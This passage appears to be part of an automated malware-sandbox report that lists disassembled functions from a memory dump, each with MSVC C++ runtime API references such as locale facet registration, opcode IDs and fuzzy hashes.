                                                                                                                          • Instruction Fuzzy Hash: D301ED7A88051EDBCF01EBE4D954AFEBBBBAF45318F100909E4116B280DF709907C780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F77CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F77D4
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F77DE
                                                                                                                          • int.LIBCPMT ref: 6E2F77F5
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7818
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F782F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F784F
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F785C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: dbe8bcba65ee986e95c3c207c83416de0c8f6c89ac381038628d903a733222d5
                                                                                                                          • Instruction ID: 529835f497a5421be0e94609878f87cd15eb1a4d75922579d679b62cbf2f7461
                                                                                                                          • Opcode Fuzzy Hash: dbe8bcba65ee986e95c3c207c83416de0c8f6c89ac381038628d903a733222d5
                                                                                                                          • Instruction Fuzzy Hash: A901ED7A84011ECBCF01DBE4D954AEEB77BBF41718F110819D8216B280DF709902CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1A49
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1A53
                                                                                                                          • int.LIBCPMT ref: 6E2F1A6A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F1A8D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1AA4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1AC4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: 285a8a56ab1be7439065713a39866bb9877a0435c1c09aba81870aff09069993
                                                                                                                          • Instruction ID: 767043b1ef7f344200bc2199173328a9dce99d4807abeab28dbacd0eff5c1b44
                                                                                                                          • Opcode Fuzzy Hash: 285a8a56ab1be7439065713a39866bb9877a0435c1c09aba81870aff09069993
                                                                                                                          • Instruction Fuzzy Hash: 4D0100BA98051EDBCF01DBE4D854AEEF7BBAF45328F640809D4116B280DF709D86C780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7ABD
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7AC7
                                                                                                                          • int.LIBCPMT ref: 6E2F7ADE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B01
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7B18
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7B38
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7B45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: e193c82f857ac928fc6446e7a0b30d7dfe8ae23faa0a0e477e2f7c1568a11c81
                                                                                                                          • Instruction ID: 2137a4ebee082e0e9dab90be3e008305c7f260dac0d92f4e0a7fe59f87798f7f
                                                                                                                          • Opcode Fuzzy Hash: e193c82f857ac928fc6446e7a0b30d7dfe8ae23faa0a0e477e2f7c1568a11c81
                                                                                                                          • Instruction Fuzzy Hash: 6B01AD7A94051EDBCF01EBF4C954AEEF77BAF86318F250909D4116B280EF709A478791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7297
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F72A1
                                                                                                                          • int.LIBCPMT ref: 6E2F72B8
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F72DB
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F72F2
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7312
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F731F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          • Opcode ID: 98c6a35e386c66cf34e3fb3f17fc04528cce9c88570bc62589555434025cc460
                                                                                                                          • Instruction ID: 72b7384913898d502c1b2b3e1c96e5031b407dff50c11a521cb39d43cb1e8d3a
                                                                                                                          • Opcode Fuzzy Hash: 98c6a35e386c66cf34e3fb3f17fc04528cce9c88570bc62589555434025cc460
                                                                                                                          • Instruction Fuzzy Hash: DB01AD7A94451EDBCF01DBE4C955AEEF77BAF81718F240809D8116B280DF709A46C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1ADE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1AE8
                                                                                                                          • int.LIBCPMT ref: 6E2F1AFF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F1B22
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1B39
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1B59
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1B66
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 6510a517716be358dab3e3edadef4eae94c873e64bbd057d87c2b875f4cd9c22
                                                                                                                          • Instruction ID: 9b9290b9ac8316961b579496d34a9b8ce2b527553900f11380a2eb1fdef35aa2
                                                                                                                          • Opcode Fuzzy Hash: 6510a517716be358dab3e3edadef4eae94c873e64bbd057d87c2b875f4cd9c22
                                                                                                                          • Instruction Fuzzy Hash: 900104BA94051EDBCF01DBE4C554AEEF77BAF41314F500809D4116B280EF709E878790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F732C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7336
                                                                                                                          • int.LIBCPMT ref: 6E2F734D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F7370
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7387
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F73A7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F73B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          • Opcode ID: 7770f8acb1258f4349d603d1da056a08da19e7e7e4a0c4bf082ca5e4e895ccf1
                                                                                                                          • Instruction ID: ccd13ef33be2d6215b0ebfbf53f2954a3f45614b1270aed55f91f8339afe1dc9
                                                                                                                          • Opcode Fuzzy Hash: 7770f8acb1258f4349d603d1da056a08da19e7e7e4a0c4bf082ca5e4e895ccf1
                                                                                                                          • Instruction Fuzzy Hash: 3901ED7A98011EDBCF01DBE8C954AEEF7BBAF41318F11080AD8116B280DF709A068780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7B52
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7B5C
                                                                                                                          • int.LIBCPMT ref: 6E2F7B73
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B96
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7BAD
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7BCD
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7BDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: 219329ec83934d844a4e10cd041c161c37abe5502da9ecd6ddc1726ce2d5363e
                                                                                                                          • Instruction ID: 5edc85e519fb2ee227c22ac5b5fc52e433dd31e59f70bf915644e7c314304105
                                                                                                                          • Opcode Fuzzy Hash: 219329ec83934d844a4e10cd041c161c37abe5502da9ecd6ddc1726ce2d5363e
                                                                                                                          • Instruction Fuzzy Hash: 8A01A17694051EDBCF01DBE4D954AEDF77BAF46318F144809D4116B280EF7499078781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7043
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F704D
                                                                                                                          • int.LIBCPMT ref: 6E2F7064
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F7087
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F709E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F70BE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F70CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767075461-0
                                                                                                                          • Opcode ID: 4ab5c2ded09b11ec336ebf857aa2b4863017e941e8dad22cc798fe7235802b27
                                                                                                                          • Instruction ID: a8bfa59aa6fd8d6dc22178aff5a2c5efe45e4f76512d66645d664fb0728cb1ee
                                                                                                                          • Opcode Fuzzy Hash: 4ab5c2ded09b11ec336ebf857aa2b4863017e941e8dad22cc798fe7235802b27
                                                                                                                          • Instruction Fuzzy Hash: 6601AD7A94052ECBCF01DBE8C954AEEF7BBAF41318F250809D411AB2C0DFB09A068791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F70D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F70D8
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F70E2
                                                                                                                          • int.LIBCPMT ref: 6E2F70F9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F711C
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7133
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7153
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7160
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767075461-0
                                                                                                                          • Opcode ID: e10b029a6847a6a9741e0e8324c4ec9e95720e8e4b15f73491d5a286d7a7b27b
                                                                                                                          • Instruction ID: 2045e977f67fcf543bb4025119392979bfef4e631a47c23b50918380a0868e7f
                                                                                                                          • Opcode Fuzzy Hash: e10b029a6847a6a9741e0e8324c4ec9e95720e8e4b15f73491d5a286d7a7b27b
                                                                                                                          • Instruction Fuzzy Hash: AB01AD7A98051EDBCF05DBE4D854AEEBB7BBF41318F140919D4106B3C0DF709A0A8781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F716D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7177
                                                                                                                          • int.LIBCPMT ref: 6E2F718E
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F71B1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F71C8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F71E8
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F71F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 648c8987bea7c7cb035647b4101f8fc82f4583b4844d610237bd14caa7cc5c3e
                                                                                                                          • Instruction ID: 0947fdf29a95a29cea795a3a45b72c2f3d297a1d5a38680d9d8211fd391d6431
                                                                                                                          • Opcode Fuzzy Hash: 648c8987bea7c7cb035647b4101f8fc82f4583b4844d610237bd14caa7cc5c3e
                                                                                                                          • Instruction Fuzzy Hash: 9C01AD7A95051EDBCF01DBE4D954AEEFBBBAF82718F150909D4106B280DF709A0B8B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F71FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7202
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F720C
                                                                                                                          • int.LIBCPMT ref: 6E2F7223
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F7246
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F725D
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F727D
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F728A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 0de72ef037a7b9925b504ad5cf4c284006501fa2bf917d22b4daf09f1fcf612c
                                                                                                                          • Instruction ID: 7c2238c44bc3b1d6534d72e1aac41ee486082b59864a7eed0508c3d1a081e5bd
                                                                                                                          • Opcode Fuzzy Hash: 0de72ef037a7b9925b504ad5cf4c284006501fa2bf917d22b4daf09f1fcf612c
                                                                                                                          • Instruction Fuzzy Hash: C601AD7A94051ECBCF01DBE8D954AEEF77BBF55328F140909E4116B280EFB09A078791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C08
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1C12
                                                                                                                          • int.LIBCPMT ref: 6E2F1C29
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1C63
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1C83
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: da1413f6a893ac32e845b8a21f46742aee31ce831caafa88dde58bad43ed0b7b
                                                                                                                          • Instruction ID: 0d75b17f64ac06641db8b3497d804984624a49afead1c4603efbc1d322d797b5
                                                                                                                          • Opcode Fuzzy Hash: da1413f6a893ac32e845b8a21f46742aee31ce831caafa88dde58bad43ed0b7b
                                                                                                                          • Instruction Fuzzy Hash: 830100BA84012EDBCF01DBE4C954AFEF7BBAF85368F550909D4106B280DF70994ACB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7C7C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7C86
                                                                                                                          • int.LIBCPMT ref: 6E2F7C9D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7CD7
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7CF7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 080848d69f58dab10b8489b60c508cdc8f8c165192027e693558dd9a462f5674
                                                                                                                          • Instruction ID: cc581544ff86141b4563209b6858e6934785fcd912c1b8d53094611991f7e678
                                                                                                                          • Opcode Fuzzy Hash: 080848d69f58dab10b8489b60c508cdc8f8c165192027e693558dd9a462f5674
                                                                                                                          • Instruction Fuzzy Hash: 9601E17684011EDBCF01DBE4D954AEEB77BAF45318F110809D8116B280DF709A428790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7456
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7460
                                                                                                                          • int.LIBCPMT ref: 6E2F7477
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F74B1
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F74D1
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F74DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 85aaab1e82187447ee7a033bc178877127b7007bc9ef56edc7bbaa9afa07f4e1
                                                                                                                          • Instruction ID: 2b7b8ccc61e030d957775d1b2774614a244b62386557589d4991b7cb6aee6379
                                                                                                                          • Opcode Fuzzy Hash: 85aaab1e82187447ee7a033bc178877127b7007bc9ef56edc7bbaa9afa07f4e1
                                                                                                                          • Instruction Fuzzy Hash: 2C01ED7A98012EDBCF01DBE4C854AEEBB7BBF81728F200819D4106B280DF7099428790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F74E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F74EB
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F74F5
                                                                                                                          • int.LIBCPMT ref: 6E2F750C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7546
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7566
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7573
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 1a00421639c339c1aebc265fc0b454cdadba553ffb56c188d0178811a39b217e
                                                                                                                          • Instruction ID: b82f4670d209038b8352715112bb72dd2458a00e8eac5cb0eb66d45ee070ed96
                                                                                                                          • Opcode Fuzzy Hash: 1a00421639c339c1aebc265fc0b454cdadba553ffb56c188d0178811a39b217e
                                                                                                                          • Instruction Fuzzy Hash: 2101AD7A94051EDBCF01DBE4D894AEEB7BBBF46329F140909D8106B290DF709A068B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7D11
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7D1B
                                                                                                                          • int.LIBCPMT ref: 6E2F7D32
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7D6C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7D8C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 1a79e79dfe4a57cbb0d1d86125635912f662eae84c58c6756ad805b699da4f3b
                                                                                                                          • Instruction ID: 8609645fc1fab9a0ddb29177abadb4d6f17950649ffe4db8eac57ab26e47d6a3
                                                                                                                          • Opcode Fuzzy Hash: 1a79e79dfe4a57cbb0d1d86125635912f662eae84c58c6756ad805b699da4f3b
